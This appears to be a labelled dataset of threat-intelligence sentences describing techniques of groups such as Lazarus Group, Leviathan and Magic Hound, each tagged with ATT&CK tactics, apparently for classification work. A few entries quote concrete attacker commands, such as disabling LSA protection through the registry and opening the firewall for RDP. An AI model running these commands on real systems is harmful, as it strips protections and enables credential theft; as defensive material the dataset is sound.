LAPSUS$ has leverage NordVPN for its egress points when targeting intended victims.,['TA0011:Command and Control']
LAPSUS$ has purchased credentials and session tokens from criminal underground forums.,['TA0043:Reconnaissance']
LAPSUS$ has shut down virtual machines from within a victim's on-premise VMware ESXi infrastructure.,['TA0040:Impact']
LAPSUS$ has searched a victim's network for collaboration platforms like SharePoint to discover further high-privilege account credentials.,['TA0009:Collection']
LAPSUS$ has called victims' help desk to convince the support personnel to reset a privileged account’s credentials.,['TA0043:Reconnaissance']
LAPSUS$ has obtained tools such as RVTools and AD Explorer for their operations.,['TA0042:Resource Development']
LAPSUS$ has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations.,['TA0001:Initial Access']
"LAPSUS$ has recruited target organization employees or contractors who provide credentials and approve an associated MFA prompt, or install remote management software onto a corporate workstation, allowing LAPSUS$ to take control of an authenticated system.",['TA0002:Execution']
"LAPSUS$ has used compromised credentials and/or session tokens to gain access into a victim's VPN, VDI, RDP, and IAMs.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
LAPSUS$ has used VPS hosting providers for infrastructure.,['TA0042:Resource Development']
Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.,['TA0007:Discovery']
"Lazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2.",['TA0009:Collection']
A Lazarus Group malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.,['TA0009:Collection']
"Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.",['TA0009:Collection']
"Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.",['TA0011:Command and Control']
Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record to ensure that the malware will persist even if a victim machine shuts down.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
"Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.",['TA0005:Defense Evasion']
Lazarus Group has digitally signed malware and utilities to evade detection.,['TA0005:Defense Evasion']
Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call CreateProcessAsUserA under that user's context.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Lazarus Group has replaced `win_fw.dll`, an internal component that is executed during IDA Pro installation, with a malicious DLL to download and execute a payload.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lazarus Group has used a custom secure delete function to overwrite file contents with data from heap memory.,['TA0040:Impact']
Lazarus Group has collected data and files from compromised networks.,['TA0009:Collection']
Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.,['TA0005:Defense Evasion']
Lazarus Group has obtained SSL certificates for their C2 domains.,['TA0042:Resource Development']
Various Lazarus Group malware modifies the Windows firewall to allow incoming connections or disable it entirely using netsh.,['TA0005:Defense Evasion']
"Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services..",['TA0005:Defense Evasion']
"Lazarus Group has used malware like WhiskeyAlfa to overwrite the first 64MB of every drive with a mix of static and random buffers. A similar process is then used to wipe content in logical drives and, finally, attempt to wipe every byte of every sector on every drive. WhiskeyBravo can be used to overwrite the first 4.9MB of physical drives. WhiskeyDelta can overwrite the first 132MB or 1.5MB of each drive with random data from heap memory.",['TA0040:Impact']
Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record on the victim's machine and has possessed MBR wiper malware since at least 2009.,['TA0040:Impact']
Lazarus Group has acquired domains related to their campaigns to act as distribution points and C2 channels.,['TA0042:Resource Development']
Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website.,['TA0001:Initial Access']
Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.,['TA0005:Defense Evasion']
A Lazarus Group malware sample performs reflective DLL injection.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Lazarus Group has created new email accounts for spearphishing operations.,['TA0042:Resource Development']
Lazarus Group collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.,['TA0043:Reconnaissance']
"Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.",['TA0005:Defense Evasion']
Lazarus Group has exfiltrated data and files over a C2 channel through its various tools and malware.,['TA0010:Exfiltration']
Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.,['TA0010:Exfiltration']
Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.,['TA0002:Execution']
Lazarus Group has used multiple proxies to obfuscate network traffic from victims.,['TA0011:Command and Control']
"Lazarus Group malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again.",['TA0011:Command and Control']
"Lazarus Group malware has deleted files in various ways, including ""suicide scripts"" to delete malware binaries from the victim. Lazarus Group also uses secure file deletion to delete files from the victim.",['TA0005:Defense Evasion']
"Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.",['TA0007:Discovery']
Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals.,['TA0043:Reconnaissance']
Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.,['TA0005:Defense Evasion']
Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked.,['TA0005:Defense Evasion']
Lazarus Group persistence mechanisms have used forfiles.exe to execute .htm files.,['TA0005:Defense Evasion']
"Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.",['TA0011:Command and Control']
Lazarus Group replaced the background wallpaper of systems with a threatening image after rendering the system unbootable with a Disk Structure Wipe.,['TA0040:Impact']
Lazarus Group has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.,['TA0011:Command and Control']
Lazarus Group has abused the KernelCallbackTable to hijack process control flow and execute shellcode.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lazarus Group malware KiloAlfa contains keylogging functionality.,"['TA0009:Collection', 'TA0006:Credential Access']"
Lazarus Group executed Responder using the command Responder file path -i IP address -rPv on a compromised host to harvest credentials and move laterally.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.",['TA0009:Collection']
Lazarus Group has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.,['TA0002:Execution']
Lazarus Group has developed custom malware for use in their operations.,['TA0042:Resource Development']
Lazarus Group has used a scheduled task named `SRCheck` to mask the execution of a malicious .dll.,['TA0005:Defense Evasion']
Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.,['TA0005:Defense Evasion']
Lazarus Group has used mshta.exe to execute HTML pages downloaded by initial access documents.,['TA0005:Defense Evasion']
Lazarus Group has used multi-stage malware components that inject later stages into separate processes.,['TA0011:Command and Control']
"Lazarus Group has used the Windows API ObtainUserAgentString to obtain the User-Agent from a compromised host to connect to a C2 server. Lazarus Group has also used various, often lesser known, functions to perform various types of Discovery and Process Injection.",['TA0002:Execution']
Lazarus Group has used nmap from a router VM to scan ports on systems within the restricted segment of an enterprise network.,['TA0007:Discovery']
"Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.",['TA0011:Command and Control']
"Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.",['TA0006:Credential Access']
Lazarus Group has used PowerShell to execute commands and malicious code.,['TA0002:Execution']
Several Lazarus Group malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by Lazarus Group also gathers process times.,['TA0007:Discovery']
"Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption.",['TA0011:Command and Control']
"Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key:HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt.",['TA0007:Discovery']
"Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.",['TA0005:Defense Evasion']
Lazarus Group has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lazarus Group malware SierraCharlie uses RDP for propagation.,['TA0008:Lateral Movement']
Lazarus Group has renamed system utilities such as wscript.exe and mshta.exe.,['TA0005:Defense Evasion']
Lazarus Group has used rundll32 to execute malicious payloads on a compromised host.,['TA0005:Defense Evasion']
Lazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.,['TA0008:Lateral Movement']
Lazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.,['TA0008:Lateral Movement']
Lazarus Group has used schtasks for persistence including through the periodic execution of a remote XSL script or a dropped VBS payload.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lazarus Group has compromised servers to stage malicious tools.,['TA0042:Resource Development']
Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.,['TA0040:Impact']
Lazarus Group malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lazarus Group has created new Twitter accounts to conduct social engineering against potential victims.,['TA0042:Resource Development']
Lazarus Group has targeted victims with spearphishing emails containing malicious Microsoft Word documents.,['TA0001:Initial Access']
Lazarus Group has sent malicious links to victims via email.,['TA0001:Initial Access']
"Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.",['TA0001:Initial Access']
A Lazarus Group malware sample encodes data with base64.,['TA0011:Command and Control']
Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic.,['TA0011:Command and Control']
Lazarus Group lnk files used for persistence have abused the Windows Update Client to execute a malicious DLL.,['TA0005:Defense Evasion']
"Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server.",['TA0007:Discovery']
"Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.",['TA0007:Discovery']
Lazarus Group has used net use to identify and establish a network connection with a remote host.,['TA0007:Discovery']
Various Lazarus Group malware enumerates logged-on users.,['TA0007:Discovery']
Lazarus Group has rebooted systems after destroying files and wiping the MBR on infected systems.,['TA0040:Impact']
A Destover-like implant used by Lazarus Group can obtain the current system time and send it to the C2 server.,['TA0007:Discovery']
"Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files to its dropped files.",['TA0005:Defense Evasion']
"Lazarus Group has obtained a variety of tools for their operations, including Responder and PuTTy PSCP.",['TA0042:Resource Development']
Lazarus Group has used administrator credentials to gain access to restricted network segments.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code.,['TA0002:Execution']
Lazarus Group has conducted C2 over HTTP and HTTPS.,['TA0011:Command and Control']
Lazarus Group has hosted malicious downloads on Github.,['TA0042:Resource Development']
Lazarus Group malware uses cmd.exe to execute commands on a compromised host. A Destover-like variant used by Lazarus Group uses a batch file mechanism to delete its binaries from the system.,['TA0002:Execution']
Lazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral movement.,['TA0002:Execution']
Several Lazarus Group malware families install themselves as new services.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LazyScripter has leveraged the BatchEncryption tool to perform advanced batch script obfuscation and encoding techniques.,['TA0005:Defense Evasion']
LazyScripter has leveraged dynamic DNS providers for C2 communications.,['TA0011:Command and Control']
LazyScripter has used dynamic DNS providers to create legitimate-looking subdomains for C2.,['TA0042:Resource Development']
LazyScripter had downloaded additional tools to a compromised host.,['TA0011:Command and Control']
LazyScripter has used JavaScript in its attacks.,['TA0002:Execution']
LazyScripter has lured users to open malicious email attachments.,['TA0002:Execution']
LazyScripter has relied upon users clicking on links to malicious files.,['TA0002:Execution']
LazyScripter has used a variety of open-source remote access Trojans for its operations.,['TA0042:Resource Development']
LazyScripter has used several different security software icons to disguise executables.,['TA0005:Defense Evasion']
LazyScripter has used `mshta.exe` to execute Koadic stagers.,['TA0005:Defense Evasion']
LazyScripter has used PowerShell scripts to execute malicious code.,['TA0002:Execution']
LazyScripter has achieved persistence via writing a PowerShell script to the autorun registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LazyScripter has used `rundll32.exe` to execute Koadic stagers.,['TA0005:Defense Evasion']
LazyScripter has used spam emails weaponized with archive or document files as its initial infection vector.,['TA0001:Initial Access']
LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document.,['TA0001:Initial Access']
LazyScripter has hosted open-source remote access Trojans used in its operations in GitHub.,['TA0042:Resource Development']
LazyScripter has used VBScript to execute malicious code.,['TA0002:Execution']
LazyScripter has used GitHub to host its payloads to operate spam campaigns.,['TA0011:Command and Control']
LazyScripter has established GitHub accounts to host its toolsets.,['TA0042:Resource Development']
LazyScripter has used batch files to deploy open-source and multi-stage RATs.,['TA0002:Execution']
"Leafminer used several tools for retrieving login and password information, including LaZagne.",['TA0006:Credential Access']
Leafminer obfuscated scripts that were used on victim machines.,['TA0005:Defense Evasion']
"Leafminer used several tools for retrieving login and password information, including LaZagne.",['TA0006:Credential Access']
"Leafminer used several tools for retrieving login and password information, including LaZagne.",['TA0006:Credential Access']
"Leafminer used several tools for retrieving login and password information, including LaZagne.",['TA0006:Credential Access']
Leafminer has infected victims using watering holes.,['TA0001:Initial Access']
Leafminer used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.,['TA0007:Discovery']
Leafminer infected victims using JavaScript code.,['TA0002:Execution']
"Leafminer used several tools for retrieving login and password information, including LaZagne.",['TA0006:Credential Access']
"Leafminer used several tools for retrieving login and password information, including LaZagne and Mimikatz.",['TA0006:Credential Access']
Leafminer used a tool called Imecab to set up a persistent remote access account on the victim machine.,['TA0003:Persistence']
Leafminer scanned network services to search for vulnerabilities in the victim system.,['TA0007:Discovery']
Leafminer used a tool called Total SMB BruteForcer to perform internal password spraying.,['TA0006:Credential Access']
Leafminer has used Process Doppelgänging to evade security software while deploying tools on compromised systems.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Leafminer used a tool called MailSniper to search through the Exchange server mailboxes for keywords.,['TA0009:Collection']
Leafminer used Microsoft’s Sysinternals tools to gather detailed information about remote systems.,['TA0007:Discovery']
"Leafminer has obtained and used tools such as LaZagne, Mimikatz, PsExec, and MailSniper.",['TA0042:Resource Development']
Leviathan has archived victim's data prior to exfiltration.,['TA0009:Collection']
Leviathan has used BITSAdmin to download additional tools.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
"Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.",['TA0005:Defense Evasion']
Leviathan has used stolen code signing certificates to sign malware.,['TA0005:Defense Evasion']
Leviathan has collected compromised credentials to use for targeting efforts.,['TA0043:Reconnaissance']
Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.,['TA0005:Defense Evasion']
Leviathan has established domains that impersonate legitimate entities to use for targeting efforts.,['TA0042:Resource Development']
Leviathan has infected victims using watering holes.,['TA0001:Initial Access']
Leviathan has utilized OLE as a method to insert malicious content inside various phishing documents.,['TA0002:Execution']
Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Leviathan has compromised email accounts to conduct social engineering attacks.,['TA0042:Resource Development']
Leviathan has created new email accounts for targeting efforts.,['TA0042:Resource Development']
Leviathan has obfuscated code using base64 and gzip compression.,['TA0005:Defense Evasion']
Leviathan has exfiltrated data over its C2 channel.,['TA0010:Exfiltration']
Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.,['TA0010:Exfiltration']
"Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.",['TA0002:Execution']
Leviathan has used external remote services such as virtual private networks to gain initial access.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Leviathan has downloaded additional scripts and files from adversary-controlled servers.,['TA0011:Command and Control']
Leviathan has conducted internal spearphishing within the victim's environment for lateral movement.,['TA0008:Lateral Movement']
"Leviathan has used publicly available tools to dump password hashes, including ProcDump and WCE.",['TA0006:Credential Access']
Leviathan has used C:\Windows\Debug and C:\Perflogs as staging directories.,['TA0009:Collection']
Leviathan has sent spearphishing attachments attempting to get a user to click.,['TA0002:Execution']
Leviathan has sent spearphishing email links attempting to get a user to click.,['TA0002:Execution']
Leviathan has used multi-hop proxies to disguise the source of their malicious traffic.,['TA0011:Command and Control']
"Leviathan has used publicly available tools to dump password hashes, including HOMEFRY.",['TA0006:Credential Access']
Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.,['TA0011:Command and Control']
Leviathan has used PowerShell for execution.,['TA0002:Execution']
Leviathan has used protocol tunneling to further conceal C2 communications and infrastructure.,['TA0011:Command and Control']
Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Leviathan has used regsvr32 for execution.,['TA0005:Defense Evasion']
Leviathan has staged data remotely prior to exfiltration.,['TA0009:Collection']
Leviathan has targeted RDP credentials and used it to move through the victim environment.,['TA0008:Lateral Movement']
Leviathan used ssh for internal reconnaissance.,['TA0008:Lateral Movement']
Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Leviathan has compromised social media accounts to conduct social engineering attacks.,['TA0042:Resource Development']
Leviathan has created new social media accounts for targeting efforts.,['TA0042:Resource Development']
"Leviathan has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.",['TA0001:Initial Access']
"Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.",['TA0001:Initial Access']
Leviathan has used steganography to hide stolen data inside other files stored on Github.,['TA0005:Defense Evasion']
Leviathan has obtained valid accounts to gain initial access.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Leviathan has used VBScript.,['TA0002:Execution']
Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems.,['TA0003:Persistence']
Leviathan has used WMI for execution.,['TA0002:Execution']
Leviathan has used WMI for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LuminousMoth has used ARP spoofing to redirect a compromised machine to an actor-controlled website.,"['TA0009:Collection', 'TA0006:Credential Access']"
LuminousMoth has manually archived stolen files from victim machines before exfiltration.,['TA0009:Collection']
LuminousMoth has signed their malware with a valid digital signature.,['TA0005:Defense Evasion']
LuminousMoth has used legitimate executables such as `winword.exe` and `igfxem.exe` to side-load their malware.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
LuminousMoth has split archived files into multiple parts to bypass a 5MB limit.,['TA0010:Exfiltration']
LuminousMoth has collected files and data from compromised machines.,['TA0009:Collection']
LuminousMoth has used a valid digital certificate for some of their malware.,['TA0042:Resource Development']
LuminousMoth has redirected compromised machines to an actor-controlled webpage through HTML injection.,['TA0042:Resource Development']
LuminousMoth has used malware that exfiltrates stolen data to its C2 server.,['TA0010:Exfiltration']
LuminousMoth has exfiltrated data to Google Drive.,['TA0010:Exfiltration']
"LuminousMoth has used malware that scans for files in the Documents, Desktop, and Download folders and in other drives.",['TA0007:Discovery']
LuminousMoth has used malware to store malicious binaries in hidden directories on victim's USB drives.,['TA0005:Defense Evasion']
LuminousMoth has downloaded additional malware and tools onto a compromised host.,['TA0011:Command and Control']
LuminousMoth has created a link to a Dropbox file that has been used in their spear-phishing operations.,['TA0042:Resource Development']
LuminousMoth has lured victims into clicking malicious Dropbox download links delivered through spearphishing.,['TA0002:Execution']
LuminousMoth has used unique malware for information theft and exfiltration.,['TA0042:Resource Development']
LuminousMoth has obtained and used malware such as Cobalt Strike.,['TA0042:Resource Development']
LuminousMoth has disguised their exfiltration malware as `ZoomVideoApp.exe`.,['TA0005:Defense Evasion']
LuminousMoth has used malware that adds Registry keys for persistence.,['TA0005:Defense Evasion']
LuminousMoth has used malicious DLLs that setup persistence in the Registry Key `HKCU\Software\Microsoft\Windows\Current Version\Run`.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LuminousMoth has used malicious DLLs to spread malware to connected removable USB drives on infected machines.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
LuminousMoth has created scheduled tasks to establish persistence for their tools.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
LuminousMoth has sent spearphishing emails containing a malicious Dropbox download link.,['TA0001:Initial Access']
LuminousMoth has used an unnamed post-exploitation tool to steal cookies from the Chrome browser.,['TA0006:Credential Access']
LuminousMoth has used a malicious DLL to collect the username from compromised hosts.,['TA0007:Discovery']
LuminousMoth has obtained an ARP spoofing tool from GitHub.,['TA0042:Resource Development']
LuminousMoth has hosted malicious payloads on Dropbox.,['TA0042:Resource Development']
LuminousMoth has used HTTP for C2.,['TA0011:Command and Control']
Machete has distributed Machete through a fake blog website.,['TA0001:Initial Access']
Machete has relied on users opening malicious attachments delivered through spearphishing to execute malware.,['TA0002:Execution']
Machete has has relied on users opening malicious links delivered through spearphishing to execute malware.,['TA0002:Execution']
Machete's Machete MSI installer has masqueraded as a legitimate Adobe Acrobat Reader installer.,['TA0005:Defense Evasion']
Machete has used msiexec to install the Machete malware.,['TA0005:Defense Evasion']
Machete used multiple compiled Python scripts on the victim’s system. Machete's main backdoor Machete is also written in Python.,['TA0002:Execution']
Machete has created scheduled tasks to maintain Machete's persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Machete has delivered spearphishing emails that contain a zipped file with malicious contents.,['TA0001:Initial Access']
Machete has sent phishing emails that contain a link to an external server with ZIP and RAR archives.,['TA0001:Initial Access']
Machete has embedded malicious macros within spearphishing attachments to download additional files.,['TA0002:Execution']
Machete has used batch files to initiate additional downloads of malicious files.,['TA0002:Execution']
Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA portal and read hundreds of email communications for information on Middle East organizations.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Magic Hound has added a user named DefaultAccount to the Administrators and Remote Desktop Users groups.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Magic Hound malware has used IRC for C2.,['TA0011:Command and Control']
Magic Hound has used gzip to archive dumped LSASS process memory and RAR to stage and compress local folders.,['TA0009:Collection']
Magic Hound malware can use a SOAP Web service to communicate with its C2 server.,['TA0011:Command and Control']
Magic Hound has removed mailbox export requests from compromised Exchange servers.,['TA0005:Defense Evasion']
Magic Hound has used base64-encoded commands.,['TA0005:Defense Evasion']
"Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites. Magic Hound has also collected credentials from over 900 Fortinet VPN servers in the US, Europe, and Israel.",['TA0043:Reconnaissance']
Magic Hound has used BitLocker and DiskCryptor to encrypt targeted workstations.,['TA0040:Impact']
Magic Hound has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine.,['TA0009:Collection']
"Magic Hound enabled and used the default system managed account, DefaultAccount, via `""powershell.exe"" /c net user DefaultAccount /active:yes` to connect to a targeted Exchange server over RDP.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Magic Hound has collected location information from visitors to their phishing sites.,['TA0043:Reconnaissance']
Magic Hound has executed scripts to disable the event log service.,['TA0005:Defense Evasion']
"Magic Hound has added the following rule to a victim's Windows firewall to allow RDP traffic - `""netsh"" advfirewall firewall add rule name=""Terminal Server"" dir=in action=allow protocol=TCP localport=3389`.",['TA0005:Defense Evasion']
Magic Hound has disabled antivirus services on targeted systems in order to upload malicious payloads.,['TA0005:Defense Evasion']
Magic Hound has used domain administrator accounts after dumping LSASS process memory.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Magic Hound has used a web shell to execute `nltest /trusted_domains` to identify trust relationships.,['TA0007:Discovery']
"Magic Hound has registered fraudulent domains such as ""mail-newyorker.com"" and ""news12.com.recover-session-service.site"" to target specific victims with phishing attacks.",['TA0042:Resource Development']
Magic Hound has used compromised domains to host links targeted to specific phishing victims.,['TA0042:Resource Development']
Magic Hound has conducted watering-hole attacks through media and magazine websites.,['TA0001:Initial Access']
Magic Hound has used Powershell to discover email accounts.,['TA0007:Discovery']
Magic Hound has compromised personal email accounts through the use of legitimate credentials and gathered additional victim information.,['TA0042:Resource Development']
Magic Hound has established email accounts using fake personas for spearphishing operations.,['TA0042:Resource Development']
"Magic Hound has identified high-value email accounts in academia, journalism, NGO's, foreign policy, and national security for targeting.",['TA0043:Reconnaissance']
Magic Hound has compromised email credentials in order to steal sensitive data.,['TA0009:Collection']
Magic Hound has used an encrypted http proxy in C2 communications.,['TA0011:Command and Control']
Magic Hound malware has used base64-encoded files and has also encrypted embedded strings with AES.,['TA0005:Defense Evasion']
Magic Hound has used the Telegram API `sendMessage` to relay data on compromised devices.,['TA0010:Exfiltration']
"Magic Hound has exploited the Log4j utility , on-premises MS Exchange servers via ""ProxyShell"" , and Fortios SSL VPNs .",['TA0001:Initial Access']
Magic Hound has deleted and overwrote files to cover tracks.,['TA0005:Defense Evasion']
"Magic Hound malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents.",['TA0007:Discovery']
"Magic Hound has acquired mobile phone numbers of potential targets, possibly for mobile malware or additional phishing operations.",['TA0043:Reconnaissance']
Magic Hound malware has a function to determine whether the C2 server wishes to execute the newly dropped file in a hidden window.,['TA0005:Defense Evasion']
Magic Hound has captured the IP addresses of visitors to their phishing sites.,['TA0043:Reconnaissance']
"Magic Hound has disabled LSA protection on compromised hosts using `""reg"" add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f`.",['TA0005:Defense Evasion']
Magic Hound has downloaded additional code and files from servers onto victims.,['TA0011:Command and Control']
Magic Hound has conducted a network call out to a specific website as part of their initial discovery activity.,['TA0007:Discovery']
Magic Hound malware is capable of keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Magic Hound has stolen domain credentials by dumping LSASS process memory using Task Manager, comsvcs.dll, and from a Microsoft Active Directory Domain Controller using Mimikatz.",['TA0006:Credential Access']
Magic Hound has copied tools within a compromised network using RDP.,['TA0008:Lateral Movement']
Magic Hound has created local accounts named `help` and `DefaultAccount` on compromised machines.,['TA0003:Persistence']
Magic Hound has collected .PST archives.,['TA0009:Collection']
Magic Hound has attempted to lure victims into opening malicious email attachments.,['TA0002:Execution']
Magic Hound has attempted to lure victims into opening malicious links embedded in emails.,['TA0002:Execution']
Magic Hound has created local accounts named `help` and `DefaultAccount` on compromised machines.,['TA0005:Defense Evasion']
Magic Hound has named a malicious script CacheTask.bat to mimic a legitimate task.,['TA0005:Defense Evasion']
Magic Hound has used `dllhost.exe` to mask Fast Reverse Proxy and `MicrosoftOutLookUpdater.exe` for Plink.,['TA0005:Defense Evasion']
Magic Hound has modified Registry settings for security tools.,['TA0005:Defense Evasion']
"Magic Hound has used KPortScan 3.0 to perform SMB, RDP, and LDAP scanning.",['TA0007:Discovery']
Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.,['TA0011:Command and Control']
Magic Hound has used PowerShell for execution and privilege escalation.,['TA0002:Execution']
Magic Hound malware can list running processes.,['TA0007:Discovery']
Magic Hound has used Plink to tunnel RDP over SSH.,['TA0011:Command and Control']
Magic Hound has used Fast Reverse Proxy for RDP traffic.,['TA0011:Command and Control']
Magic Hound malware has used Registry Run keys to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Magic Hound has used Remote Desktop Services to copy tools on targeted systems.,['TA0008:Lateral Movement']
Magic Hound has exported emails from compromised Exchange servers including through use of the cmdlet `New-MailboxExportRequest.`,['TA0009:Collection']
Magic Hound has used Ping for discovery on targeted networks.,['TA0007:Discovery']
Magic Hound has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.,['TA0005:Defense Evasion']
Magic Hound has used scheduled tasks to establish persistence and execution.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
